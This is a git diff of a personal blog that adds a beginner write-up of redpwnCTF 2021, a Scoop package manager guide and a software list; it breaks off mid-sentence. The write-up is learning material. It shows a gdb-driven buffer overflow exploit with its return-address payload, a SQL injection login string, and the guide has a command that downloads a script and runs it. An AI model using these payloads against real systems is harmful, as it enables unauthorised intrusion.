𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨" +rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self! +can you write me a heartfelt message to cheer me up? :( +sh-5.1$ # another shell :tada: +``` + +Now it was time to actually do the exploit on the remote server. + +I whipped up the most disgusting and janky python code that I won't go into +detail about, but here's what is does (in short): + +1. Create a thread to capture data from the server and forward it to `stdout` +2. Capture user commands using `input()` and decide what to do with them on the main thread + +The code for this script can be found +[here](https://github.com/lonkaars/redpwn/blob/master/challenges/generic/pwn.py), +though be warned, it's _very_ janky and you're probably better off copying +stuff from stackoverflow. Writing your own tools is more fun though, and might +also be faster than trying to wrestle with existing tools to try to get them to +do exactly what you want them to do. In this case I could've also just used [a +simple +command](https://reverseengineering.stackexchange.com/questions/13928/managing-inputs-for-payload-injection?noredirect=1&lq=1). + +It did help me though and I actually had to copy it for use in the other buffer +overflow challenge that I solved, so I'll probably refactor it someday for use +in other CTFs. + +### crypto/round-the-bases + +This crypto challenge uses a text file with some hidden information. If you +open up the file in a text editor, and adjust your window width, you'll +eventually see the repeating pattern line up. This makes it very easy to see +what part of the pattern is actually changing: + +``` +----------------------xxxx---- +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +``` + +I wrote a simple python script to parse this into binary data, and it worked on +the first try: + +```py +# read the file into a string +file = open("./round-the-bases") +content = file.read() +file.close() + +# split on every 30th character into a list +n = 30 +arr = [ content[i : i + n] for i in range(0, len(content), n) ] + +bin = [] +for line in arr: + sub = line[16:20] # the part that changes + if sub == 'IIcu': # IIcu -> 0x0 + bin.append('0') + else: # K0o0 -> 0x1 + bin.append('1') + +bin = ''.join(bin) # join all the list indices together into a string + +# decode the binary string into ascii characters +for i in range(0, len(bin), 8): + print(chr(int(bin[i:i+8], 2)), end='') + +# newline for good measure +print("\n", end='') +``` + +### pwn/ret2generic-flag-reader + +This was the second binary exploitation challenge I tackled, and it went much +better than the first because I (sort of) knew what I was doing by now. + +I figured the 'ret2' part of the title challenge was short for 'return to', and +my suspicion was confirmed after looking at the c source: + +```c +#include +#include +#include + +void super_generic_flag_reading_function_please_ret_to_me() +{ + char flag[0x100] = {0}; + FILE *fp = fopen("./flag.txt", "r"); + if (!fp) + { + puts("no flag!! contact a member of rob inc"); + exit(-1); + } + fgets(flag, 0xff, fp); + puts(flag); + fclose(fp); +} + +int main(void) +{ + char comments_and_concerns[32]; + + setbuf(stdout, NULL); + setbuf(stdin, NULL); + setbuf(stderr, NULL); + + puts("alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable..."); + puts("how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!"); + puts("slap on some flavortext and there's no way rob will fire me now!"); + puts("this is genius!! what do you think?"); + + gets(comments_and_concerns); +} + +``` + +With my newfound knowledge of binary exploitation, I figured I would have to +overwrite the return pointer on the stack somehow, so the program calls the +`super_generic_flag_reading_function_please_ret_to_me` function that isn't +called at all in the original. + +The only input we have control over is again a call to `gets();` + +Let's look at the disassembly in gdb: + +``` +(gdb) disas main +Dump of assembler code for function main: + 0x00000000004013f4 <+79>: call 0x4010a0 + 0x00000000004013f9 <+84>: lea rdi,[rip+0xca0] # 0x4020a0 + 0x0000000000401400 <+91>: call 0x4010a0 + 0x0000000000401405 <+96>: lea rdi,[rip+0xd0c] # 0x402118 + 0x000000000040140c <+103>: call 0x4010a0 + 0x0000000000401411 <+108>: lea rdi,[rip+0xd48] # 0x402160 + 0x0000000000401418 <+115>: call 0x4010a0 + 0x000000000040141d <+120>: lea rax,[rbp-0x20] + 0x0000000000401421 <+124>: mov rdi,rax + 0x0000000000401424 <+127>: call 0x4010e0 + 0x0000000000401429 <+132>: mov eax,0x0 + 0x000000000040142e <+137>: leave + 0x000000000040142f <+138>: ret +End of assembler dump. +``` + +We see again multiple calls to `` and right after a call to +``. There is no `cmp` and `jne` to be found in this challenge though. + +The goal is to overwrite the _return address_. This is a memory address also +stored in memory, and the program will move execution to that memory address +once it sees a `ret` instruction. In this 'vanilla' state, the return address +always goes to the assembly equivalent of an `exit()` function. Let's see if we +can overwrite it by giving too much input: + +``` +(gdb) break *0x000000000040142f +Breakpoint 1 at 0x40142f +(gdb) run < <(python3 -c "print('a' * 56)") +-- Breakpoint 1 hit -- +(gdb) info registers +rax 0x0 0x0 +rbx 0x401430 0x401430 +rsi 0x7ffff7f7d883 0x7ffff7f7d883 +rdi 0x7ffff7f804e0 0x7ffff7f804e0 +rbp 0x6161616161616161 0x6161616161616161 +rsp 0x7fffffffd898 0x7fffffffd898 +rip 0x40142f 0x40142f +``` + +As you can see, the $rbp register is completely overwritten with `0x61`'s. +Let's check the $rsp register to see where the `main()` function tries to go +after `ret`: + +``` +(gdb) run +Starting program: ret2generic-flag-reader +alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... +how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! +slap on some flavortext and there's no way rob will fire me now! +this is genius!! what do you think? +a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 +-- Breakpoint 1 hit -- +(gdb) x/1gx $rsp +0x7fffffffd898: 0x3363326331633063 +``` + +Let's use CyberChef to see what `0x3363326331633063` is in ascii! + +![](/img/redpwn2021/cyberchef1.png) + +Hmm, it's backwards. Let's reverse it! + +![](/img/redpwn2021/cyberchef2.png) + +Let's find the address of the super generic flag reading function with gdb. + +``` +(gdb) print super_generic_flag_reading_function_please_ret_to_me +$2 = {} 0x4011f6 +``` + +Now we're ready to craft a string that exploits the program and runs the secret +function! + +``` +a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 <- original + c0c1c2c3 <- ends up in $rsp +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa <- padding ( 0x28 * 'a' ) + + c 0 c 1 c 2 c 3 <- ends up in $rsp + 3 c 2 c 1 c 0 c <- reverse +0x3363326331633063 <- reverse (hex) +0x00000000004011f6 <- pointer we want in $rsp + f611400000000000 <- reverse + \xf6\x11\x40\x00\x00\x00\x00\x00 <- python bytestring + +exploit string: +b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00' +``` + +Now let's try it in an environment-less shell: + +``` +python3 -c "import sys; sys.stdout.buffer.write(b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00')" | ./ret2generic-flag-reader +alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... +how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! +slap on some flavortext and there's no way rob will fire me now! +this is genius!! what do you think? +flag{this_is_a_dummy_flag_go_solve_it_yourself} + +Segmentation fault (core dumped) +sh-5.1$ +``` + +### rev/bread-making + +For this challenge, I first tried using iaito again to do some program flow +analysis. After giving up on that, I decided to instead brute-force the correct +steps by hand. This was a very long and boring process. + +First I used `strings` again to extract all the dialogue and user input strings +from the binary. Then I filtered them to not include obvious dialogue, but only +the possible user input strings. And this is the correct path that gives the +flag: + +``` +add flour +add salt +add yeast +add water +hide the bowl inside a box +wait 3 hours +work in the basement +preheat the toaster oven +set a timer on your phone +watch the bread bake +pull the tray out with a towel +open the window +unplug the oven +unplug the fire alarm +wash the sink +clean the counters +flush the bread down the toilet +get ready to sleep +close the window +replace the fire alarm +brush teeth and go to bed +``` + +In hindsight I could've probably made a simple python script to brute force all +remaining possibilities until it got longer output from the program, but +laziness took over and I decided that spending 45 minutes doing very dull work +was more worth it instead. + +## Willem's part in the CTF + +Hi, Willem here. + +In this part I will talk about my experience during the CTF and The +collaboration between me and Loek. + +### web/orm-bad + +This was also my first CTF, just like Loek, because of this was quite uncertain +about my skill level. For example, I have no experience using Linux systems, +but from what I learned before the CTF it is quite essential. My fear of not +being able to do any of the challenges disappeared quickly after we had +completed the beginner challenges. With a simple sql injection I got my first +real flag: + +``` +username: admin';-- +password: +flag{this_is_a_dummy_flag_go_solve_it_yourself} +``` + +We had planned to use github's projects to track progress on challenges, but +when you're actually doing a challenge it's the last thing you think about. +So, we didn't really know who was doing which challenge, but because we're a +team of two this wasn't a big problem. + +The most challenge were a bit to hard for me. Some I would get pretty far, but +needed Loek's help to solve it. Others I didn't even attempt to begin on. + +### misc/the-substitution-game + +One challenge I spend a lot of time on was __The substitution game__. In the +substitution game you had to substitute certain parts of the input string to +get the desired output string. I got to level for of 6. Level 1 and 2 to were +really simple, but at level 3 you started to need to really understand the +game. + +``` +level 3: +initial: aaaaaaaaaaaaaa (the amount of a's varied) +target: a +``` + +The solution is really simple, but it's pretty hard to get to it. You want to +remove 'a's so I started with `a => `, this turn all 'a's to None and left you +with an empty string. The problem is you can't substitute anything in an empty +string. The solution was `aa => a`, this removed an 'a' every time the initial +string got checked. To get this solution you had to realize, that the program +would always substitute the first instance it would come across, and the +program was set to do way more than needed substitutions. This would come handy +in the next level. + +``` +level 4: +initial: ggggggggggg (the amount of g's varied) +target: ginkoid +``` + +After completing level 3 this level looks very easy, just substitute the g's +like before `gg => g` and turn the last g into ginkoid `g => ginkoid` , but +this didn't work because of the way the program worked, after getting to a +valid solution I didn't stop and the single g in ginkoid would also change to +ginkoid. You would get infinite ginkoid. The solution was: + +``` +gg => ginkoid; ginkoidginkoid => ginkoid; ginkoidg => ginkoid +``` + +I began with noticing you couldn't just change the g, because that would also +change the g in ginkoid. so double gg becomes ginkoid. We have to use the same +trick as in level 3 to gain only one ginkoid `ginkoidginkoid => ginkoid` +because of the way we changed the single g's to ginkoid it would only work with +an even amount of g's. In the case there was an uneven amount of g's we would +be left with ginkoidg, so we remove it `ginkoidg => ginkoid`. + +I found this challenge really enjoyable and during this challenge I noticed +that I most enjoy the puzzle aspect of computer science, puzzling for hours to +fix a bug and then finally finding a solution. + +I didn't complete many challenges and wasn't really able to help Loek, but I +really enjoyed the CTF. It's a really fun way to test your skills and +knowledge. In the end I'm really happy with the score we (mostly Loek) got and +I think I’ll take part in other CTFs in the future. + +## Epilogue + +Of the 47 total challenges, me and Willem only solved 15. My end goal for this +CTF wasn't winning to begin with, so the outcome didn't matter for me. After +the second day I set the goal of reaching the 3rd page of the leaderboards as +my goal, and we reached 277'th place in the end which made my mom very proud! + +![](/img/redpwn2021/leaderboard.png) + +I enjoyed the CTF a lot! There were some very frustrating challenges, and I +still don't get how people solved web/wtjs, but that's fine. I did learn how to +use GDB and a lot of other things during the CTF which were all very rewarding. +I will definitely be participating in the 2022 redpwnCTF, and maybe even some +others if they're beginner friendly :) + +During the Radboud CTF and this CTF I've accumulated a lot of ideas to maybe +host one myself, though I have no clue where to start with that. Maybe keep an +eye out for that ;) + diff --git a/_items/scoop.md b/_items/scoop.md new file mode 100644 index 0000000..36c7cc2 --- /dev/null +++ b/_items/scoop.md @@ -0,0 +1,118 @@ +--- +title: Scoop guide +subtitle: Handbook and quick explanations +tags: + - windows + - normie + - software +cover: /img/scoop.png +--- + +Here's a quick reference for returning customers: + +```bash +# installing stuff +scoop install + +# removing stuff +scoop uninstall + +# updating all the stuff +scoop update * + +# update single stuff +scoop update + +# add a bucket / repository +scoop bucket add + +# searching for stuff +scoop search +# keep in mind that scoop's search is very slow +``` + +For more things look in the [wiki](https://github.com/lukesampson/scoop/wiki) +or in the wiki's [faq](https://github.com/lukesampson/scoop/wiki/FAQ). + +Now here's a list of things that people who don't use `cmd` get confused about: + +- Highlighting text in cmd selects it. If you've selected text, right click + copies it. If you don't have text selected, right click pastes it. +- Ctrl-c and ctrl-v won't work as you expect them to. The same goes for most + keyboard shortcuts commonly used in graphical ('normal') programs. Ctrl-c is + used to stop programs in cmd, and ctrl-v doesn't do anything. The keyboard + shortcut for pasting in cmd is shift+insert. +- Clicking inside the cmd window to place your text cursor doesn't work, + because clicking is only used for selection. You'll have to use your arrow + keys to move the cursor. You can also use ctrl-a to move it to the beginning + of a line, or ctrl-e to move it to the end of a line. +- It's normal for programs in cmd to not give any output and just silently + quit. This is normal and if a program doesn't output anything you can assume + it did the thing you wanted it to do. (though scoop is very verbose and will + print progress info most of the time) +- You can type new commands for the computer to execute once you see the prompt + again. Most of the time it looks something like this: + + ``` + C:\Windows\System32> + ``` + +## Installation (on a fresh system) + +```powershell +Set-ExecutionPolicy RemoteSigned -scope CurrentUser +iwr -useb get.scoop.sh | iex +``` + +## Some more things explained + +### Why scoop at all + +Scoop is a package manager. These are the primary way you install software on +Linux. The reason package managers are awesome, is because it's like an app +store in the sense that it's one central place to install all your software, +but without the downsides of an actual app store. + +If you develop your own software, you can write a scoop install script for it, +and create a pull request on GitHub. This way basically anyone can add software +into scoop, but it's still moderated better than for example wikipedia. + +Scoop also has more open source software, which is better (most of the time). +This means you're more likely to get 'better software' like 7-zip instead of +(bad) (paid) software like winrar or winzip. + +Scoop also uses powershell scripts to install software which means you won't +have to click through installers, or watch out for sneaky buttons that also +install some weird toolbar in your browser. + +### Buckets + +Buckets are a collection of similar programs. The way these are managed is +through something called a repository. This is just a central place for +multiple people to view and collaborate on scoop at once. + +Buckets you'll probably want to add are `extras`, `nonportable`, `games`, and +`java`. + +By adding a bucket you're not actually installing any software, but scoop will +check for updates on that bucket. + +If you want to for example install java using scoop, you'll first have to add +the `java` bucket by running `scoop bucket add java` in order for scoop to be +able to find the `openjdk` package. Then you can run `scoop install openjdk`, +and then you'll have java installed. + +### Brave (browser) + +Because the default brave browser in scoop isn't updated, I use the [everonline +repo](https://github.com/everonline/brave). Here's how to do that: + +```bash +scoop bucket add everonline https://github.com/everonline/brave.git +scoop install everonline/brave +``` + +## Awesome software + +[Here's](/post/software#pc-software) a list of the software I use pretty much every day, +and some of it is also available for windows using scoop! diff --git a/_items/software.md b/_items/software.md new file mode 100644 index 0000000..d2cda4a --- /dev/null +++ b/_items/software.md @@ -0,0 +1,280 @@ +--- +title: Software that I use +subtitle: Desktop software, server software, phone apps, everything +tags: + - software + - open + - source + - server + - phone +cover: /img/software.png +--- + +## PC software + +All of the software on this page is cool and I think you should try it. I also +use all of this software, and will update this page when I find new, *even +cooler* software to use instead. Most if not all of my configuration files +(dotfiles) are on my [github](https://github.com/lonkaars/dotfiles). You can +clone these and edit them to fit your needs, or you can use them as a reference +for when you can't figure out how to configure something. + +### Regular software + +- **Email client**: [neomutt](https://neomutt.org/). It's fast and simple, + though configuring it was a pain in the ass. I'm currently using it in + combination with mbsync and imapnotify to get notifications for new emails, + and sync my mailbox for fast email viewing. + +- **Music player**: [mpd](https://www.musicpd.org/) with + [ncmpcpp](https://github.com/ncmpcpp/ncmpcpp). This is the best music setup + I've ever used. I download all my music in .flac format and mpd *just works*. + Since mpd has a server-client structure, I could also use this to set up + multiple devices that can add music to a central queue at a party or + something, but I just use it to launch [an fzf mpc + wrapper](https://github.com/DanielFGray/fzf-scripts/blob/master/fzmp) to + quickly add music while I'm doing something else. + +- **Text editor**: [nvim](https://neovim.io/). It's vim. If you don't like vim, + you should try using it longer. If you still don't like vim, you can use + [code oss](https://appimage.github.io/Code_OSS/) which is visual studio code + but without Microsoft's creepy telemetry features. + +- **PDF viewer**: [zathura](https://pwmt.org/projects/zathura/). It's a pdf + viewer with vim bindings, and it works with my TeX editing setup's live + reload thingy. + +- **Image viewer**: [sxiv](https://github.com/muennich/sxiv). It's like zathura + but for images, but it also does a bunch of other stuff that I don't use very + often. + +- **Browser**: [brave](https://brave.com/). It's a normie-friendly chromium + fork with extra privacy features! I of course use brave (or any + chromium-based browser) with [tampermonkey](https://www.tampermonkey.net/), + [ublock origin](https://ublockorigin.com/), + [stylus](https://github.com/openstyles/stylus) and [dark + reader](https://darkreader.org/). + +- **Terminal**: [st](https://st.suckless.org/). It's fast and simple, nothing + to complain about. I have my [own st fork](https://github.com/lonkaars/st), + with a bunch of patches that make me happy. + +- **Password manager**: [bitwarden](https://bitwarden.com/). Open source + password manager that you can host yourself. It also has public servers which + are mostly free, but some features like time-based one-time passwords are + paid. All the clients are also open source. + +- **Document typesetting**: [LaTeX](https://www.latex-project.org/) (using + [latexmk](https://personal.psu.edu/~jcc8/software/latexmk/) with the + [XeTeX](http://xetex.sourceforge.net/) compiler). + +- **File browser**: [ranger](https://github.com/ranger/ranger). It's kind of + slow, but I use the bulkrename feature very often, and I haven't gotten used + to the perl `rename` script yet. + +- [unar](https://github.com/MacPaw/XADMaster). I like running `unar [archive]` + instead of using `7z`, `tar`, `unzip`, etc. It creates a new folder to unpack + to automatically so it does exactly what I need. + +### OS stuff + +- **Window manager**: [i3-gaps](https://github.com/Airblader/i3). I tried it + once and didn't switch back so this is a winner I guess. I've also heard good + things about [dwm](https://dwm.suckless.org/), though I haven't used it + myself. Most people complain about i3's limited configurability, but I + haven't ran into something that it doesn't do for me. + +- **Application launcher**: [rofi](https://github.com/davatorium/rofi). I've + been using rofi since I started using linux, and haven't switched to anything + else because it's *very* configurable, and has a dmenu mode for using it + instead of dmenu with other scripts. I use it primarily as my application + launcher, but I also have a hotkey setup to launch `bwmenu` which is a script + that fills in bitwarden passwords using rofi. + +- **Shell**: [zsh](https://www.zsh.org/) with [oh-my-zsh](https://ohmyz.sh/). + It's zsh, all the cool kids use it already. I do have `/usr/bin/sh` `ln -s`'d + to `/usr/bin/bash`, but I'd like to change that to `/usr/bin/dash`. Eh, I'll + get around to it someday. + +- **Status Bar**: [polybar](https://github.com/polybar/polybar). Simple bar, + gets the job done, the configuration files make me go insane though. It took + me a good half year of ricing to understand the polybar configuration files, + and I'm still not sure if I do. + +- **Notification daemon**: [dunst](https://dunst-project.org/). I used to use + deadd-notification-center, but that has waaaay too many haskell dependencies + on arch, so I don't use that anymore. + +- **Global keybinds**: + [xbindkeys](https://www.nongnu.org/xbindkeys/xbindkeys.html). Simple + configuration, works flawlessly, 10/10. + +- **Compositor**: [picom](https://github.com/yshui/picom). It's a simple + compositor. I use it to enable vsync for desktop windows, and I have it set + up to only show a drop shadow on floating i3 windows. + +### Closed source + +- [discord](https://discord.com/). Gamer. The only reason this is listed here + is because I use discord with + [betterdiscord](https://github.com/rauenzi/BetterDiscordApp) (which *is* + open-source). Betterdiscord allows you to use custom css themes, custom + plugins and a whole bunch of other cool stuff that regular discord doesn't + do. It's technically against TOS, but I don't really care as I only use + quality of life improvement plugins. + +- [figma](https://figma.com). It's the designing software that I use to create + user interface or website mockups. It's easily accessible though a browser, + and it uses webassembly so it's also decently fast. It's free for personal + use. + +## Server software + +This is the software that runs on my home server. + +### Email + +I used [Luke Smith's](http://lukesmith.xyz/) +[emailwiz](https://github.com/LukeSmithxyz/emailwiz) to set up my email server. +The script installs and configures an email setup with +[postfix](http://www.postfix.org/), [dovecot](https://www.dovecot.org/), +[spamassassin](https://spamassassin.apache.org/) and +[opendkim](http://www.opendkim.org/). + +### Etesync + +I run my own [etesync](https://www.etesync.com/) server for synchronizing my +to-do lists, calendar and contacts. It's relatively easy to set up, and has a +web interface that you can use with your own self-hosted instance. + +### Bitwarden + +I also run my own [bitwarden](https://github.com/bitwarden/server) server. It +uses docker with docker-compose, which are two things that I'm supposed to know +about, but I don't. + +I'm working on a connect 4 website myself, and I'm planning on learning to use +docker with docker-compose to make it easier to run the seperate parts that are +needed to host the project. + +### Git + +I have a [cgit](https://git.zx2c4.com/cgit/about/) server to host my git +repositories on , and I use +[gitolite](https://gitolite.com/gitolite/) for ssh git push access. Cgit is +very easy to set up, and I like it very much. Gitolite on the other hand is a +pain in the ass to set up, because the documentation is not that great. If +you're planning on using gitolite on your own server, set the umask in +`~/.gitolite.rc` of your server's git account to `0022`. + +### SFTP + +I have two semi-public sftp accounts set up on my server: `media` and `sftp`. +`sftp` is for generic file sharing, and `media` is for my media. Both accounts +have tty login disabled and are chroot-jailed to /var/media and /var/sftp. + +## Phone apps + +These are the apps that I use on my phone. I recently upgraded my 2017 Nokia 6 +to a Google Pixel 4a (sunfish). It's a great phone! You can root it or flash +custom rom's very easily, and it gave me new appreciation for the basic +features of a smartphone. The Pixel 4a has really good haptics. They're almost +iPhone level, though I won't be using iPhones any time soon. + +I flashed [CalyxOS](https://calyxos.org/) as soon as it was 5 minutes out of +the box, but ended up not liking it because of it's nonexistant root support. +I'm currently using [LineageOS](https://lineageos.org/) 18.1, rooted using +[magisk](https://github.com/topjohnwu/Magisk). + +### Open source + +- **One-time password generator**: [andotp](https://github.com/andOTP/andOTP) + +- **App store**: [aurora store](https://gitlab.com/AuroraOSS/AuroraStore). This + app works better when you're rooted, but it's way better than the google play + store. + +- **App store**: [aurora f-droid](https://gitlab.com/AuroraOSS/auroradroid) + +- **Password manager**: [bitwarden](https://github.com/bitwarden/mobile) + +- **Browser**: [bromite](https://www.bromite.org/). This is basically ungoogled + chromium but for mobile. + +- **Calendar**: [etar](https://github.com/Etar-Group/Etar-Calendar) + +- [etesync](https://github.com/etesync/android) + +- **File browser**: [material + files](https://github.com/zhanghai/MaterialFiles). It looks sexy, it's free, + it's awesome. + +- **Email client**: [k-9](https://k9mail.app/). + +- **Maps**: [osmand](https://osmand.net/). + +- **Music player**: [shuttle](https://www.shuttlemusicplayer.com/). It looks + sexy, it's free, it's awesome. + +- **Instant messenger**: [signal](https://signal.org/). [papa musk said + it](https://twitter.com/elonmusk/status/1347165127036977153). + +- **Manga reader**: [tachiyomi](https://tachiyomi.org/) + +- **To-do lists**: [tasks.org](https://tasks.org/). This is easily the best + to-do app I've ever used, and it integrated very well with etesync. + + If you're cheap (like me), you can get 'free' pro by downloading this app + through f-droid instead of the play store. It's still nice to donate. + +- **Smart home control**: [home assistant](https://www.home-assistant.io/). + [the whole spiel](/post/homeauto). + +- **Notes**: [leaflet](https://github.com/PotatoProject/Leaflet). It's + basically Google Keep but open source and without Google. It's part of the + PotatoProject which is a custom Android rom, and there were plans for an open + source notes sync server that you could host yourself, but I haven't seen + that pop up yet. + + The app is written in Flutter, and did have choppy scrolling animations on my + old phone. I'm not sure if that was a bug or my old phone just being + underpowered, but it's something I want to mention anyways. + +- **Weather**: [geometric + weather](https://f-droid.org/en/packages/wangdaye.com.geometricweather/). + It's really good. Good animations, live wallpaper, fast, etc. + +- **RSS Reader**: [tiny tiny + rss](https://www.f-droid.org/en/packages/org.fox.tttrss/). This app requires + that you host your own tiny tiny rss server, but I do and the app works + great! + +- **Myanimelist client**: [moelist](https://github.com/axiel7/MoeList). I don't + know how I found this app but it's a real gem. If you use MAL you should + download this app. + +- **PDF reader**: [pdf viewer + plus](https://f-droid.org/en/packages/com.gsnathan.pdfviewer/). This is the + only one that's actually decent. Good UI, good UX, pretty fast rendering. + 9/10 + +### Requires root + +- **Ad-blocker**: [adaway](https://adaway.org/). It does have a rootless mode, + though the app warns you that it's slower and impacts your battery life + negatively. + +- **Theme engine**: [substratum](https://github.com/substratum/substratum). + Substratum requires root on android 9+, unless you're on stock samsung (one + ui). Android 8 and under users can buy + [andromeda](https://play.google.com/store/apps/details?id=projekt.andromeda). + Samsung users can buy + [synergy](https://play.google.com/store/apps/details?id=projekt.samsung.theme.compiler). + They're both developed by the same people behind substratum, but they're not + open source. + +### Closed source + +- **Reddit client**: + [sync](https://play.google.com/store/apps/details?id=com.laurencedawson.reddit_sync) + diff --git a/_posts/2021-04-13-software.md b/_posts/2021-04-13-software.md deleted file mode 100644 index d2cda4a..0000000 --- a/_posts/2021-04-13-software.md +++ /dev/null @@ -1,280 +0,0 @@ ---- -title: Software that I use -subtitle: Desktop software, server software, phone apps, everything -tags: - - software - - open - - source - - server - - phone -cover: /img/software.png ---- - -## PC software - -All of the software on this page is cool and I think you should try it. I also -use all of this software, and will update this page when I find new, *even -cooler* software to use instead. Most if not all of my configuration files -(dotfiles) are on my [github](https://github.com/lonkaars/dotfiles). You can -clone these and edit them to fit your needs, or you can use them as a reference -for when you can't figure out how to configure something. - -### Regular software - -- **Email client**: [neomutt](https://neomutt.org/). It's fast and simple, - though configuring it was a pain in the ass. I'm currently using it in - combination with mbsync and imapnotify to get notifications for new emails, - and sync my mailbox for fast email viewing. - -- **Music player**: [mpd](https://www.musicpd.org/) with - [ncmpcpp](https://github.com/ncmpcpp/ncmpcpp). This is the best music setup - I've ever used. I download all my music in .flac format and mpd *just works*. - Since mpd has a server-client structure, I could also use this to set up - multiple devices that can add music to a central queue at a party or - something, but I just use it to launch [an fzf mpc - wrapper](https://github.com/DanielFGray/fzf-scripts/blob/master/fzmp) to - quickly add music while I'm doing something else. - -- **Text editor**: [nvim](https://neovim.io/). It's vim. If you don't like vim, - you should try using it longer. If you still don't like vim, you can use - [code oss](https://appimage.github.io/Code_OSS/) which is visual studio code - but without Microsoft's creepy telemetry features. - -- **PDF viewer**: [zathura](https://pwmt.org/projects/zathura/). It's a pdf - viewer with vim bindings, and it works with my TeX editing setup's live - reload thingy. - -- **Image viewer**: [sxiv](https://github.com/muennich/sxiv). It's like zathura - but for images, but it also does a bunch of other stuff that I don't use very - often. - -- **Browser**: [brave](https://brave.com/). It's a normie-friendly chromium - fork with extra privacy features! I of course use brave (or any - chromium-based browser) with [tampermonkey](https://www.tampermonkey.net/), - [ublock origin](https://ublockorigin.com/), - [stylus](https://github.com/openstyles/stylus) and [dark - reader](https://darkreader.org/). - -- **Terminal**: [st](https://st.suckless.org/). It's fast and simple, nothing - to complain about. I have my [own st fork](https://github.com/lonkaars/st), - with a bunch of patches that make me happy. - -- **Password manager**: [bitwarden](https://bitwarden.com/). Open source - password manager that you can host yourself. It also has public servers which - are mostly free, but some features like time-based one-time passwords are - paid. All the clients are also open source. - -- **Document typesetting**: [LaTeX](https://www.latex-project.org/) (using - [latexmk](https://personal.psu.edu/~jcc8/software/latexmk/) with the - [XeTeX](http://xetex.sourceforge.net/) compiler). - -- **File browser**: [ranger](https://github.com/ranger/ranger). It's kind of - slow, but I use the bulkrename feature very often, and I haven't gotten used - to the perl `rename` script yet. - -- [unar](https://github.com/MacPaw/XADMaster). I like running `unar [archive]` - instead of using `7z`, `tar`, `unzip`, etc. It creates a new folder to unpack - to automatically so it does exactly what I need. - -### OS stuff - -- **Window manager**: [i3-gaps](https://github.com/Airblader/i3). I tried it - once and didn't switch back so this is a winner I guess. I've also heard good - things about [dwm](https://dwm.suckless.org/), though I haven't used it - myself. Most people complain about i3's limited configurability, but I - haven't ran into something that it doesn't do for me. - -- **Application launcher**: [rofi](https://github.com/davatorium/rofi). I've - been using rofi since I started using linux, and haven't switched to anything - else because it's *very* configurable, and has a dmenu mode for using it - instead of dmenu with other scripts. I use it primarily as my application - launcher, but I also have a hotkey setup to launch `bwmenu` which is a script - that fills in bitwarden passwords using rofi. - -- **Shell**: [zsh](https://www.zsh.org/) with [oh-my-zsh](https://ohmyz.sh/). - It's zsh, all the cool kids use it already. I do have `/usr/bin/sh` `ln -s`'d - to `/usr/bin/bash`, but I'd like to change that to `/usr/bin/dash`. Eh, I'll - get around to it someday. - -- **Status Bar**: [polybar](https://github.com/polybar/polybar). Simple bar, - gets the job done, the configuration files make me go insane though. It took - me a good half year of ricing to understand the polybar configuration files, - and I'm still not sure if I do. - -- **Notification daemon**: [dunst](https://dunst-project.org/). I used to use - deadd-notification-center, but that has waaaay too many haskell dependencies - on arch, so I don't use that anymore. - -- **Global keybinds**: - [xbindkeys](https://www.nongnu.org/xbindkeys/xbindkeys.html). Simple - configuration, works flawlessly, 10/10. - -- **Compositor**: [picom](https://github.com/yshui/picom). It's a simple - compositor. I use it to enable vsync for desktop windows, and I have it set - up to only show a drop shadow on floating i3 windows. - -### Closed source - -- [discord](https://discord.com/). Gamer. The only reason this is listed here - is because I use discord with - [betterdiscord](https://github.com/rauenzi/BetterDiscordApp) (which *is* - open-source). Betterdiscord allows you to use custom css themes, custom - plugins and a whole bunch of other cool stuff that regular discord doesn't - do. It's technically against TOS, but I don't really care as I only use - quality of life improvement plugins. - -- [figma](https://figma.com). It's the designing software that I use to create - user interface or website mockups. It's easily accessible though a browser, - and it uses webassembly so it's also decently fast. It's free for personal - use. - -## Server software - -This is the software that runs on my home server. - -### Email - -I used [Luke Smith's](http://lukesmith.xyz/) -[emailwiz](https://github.com/LukeSmithxyz/emailwiz) to set up my email server. -The script installs and configures an email setup with -[postfix](http://www.postfix.org/), [dovecot](https://www.dovecot.org/), -[spamassassin](https://spamassassin.apache.org/) and -[opendkim](http://www.opendkim.org/). - -### Etesync - -I run my own [etesync](https://www.etesync.com/) server for synchronizing my -to-do lists, calendar and contacts. It's relatively easy to set up, and has a -web interface that you can use with your own self-hosted instance. - -### Bitwarden - -I also run my own [bitwarden](https://github.com/bitwarden/server) server. It -uses docker with docker-compose, which are two things that I'm supposed to know -about, but I don't. - -I'm working on a connect 4 website myself, and I'm planning on learning to use -docker with docker-compose to make it easier to run the seperate parts that are -needed to host the project. - -### Git - -I have a 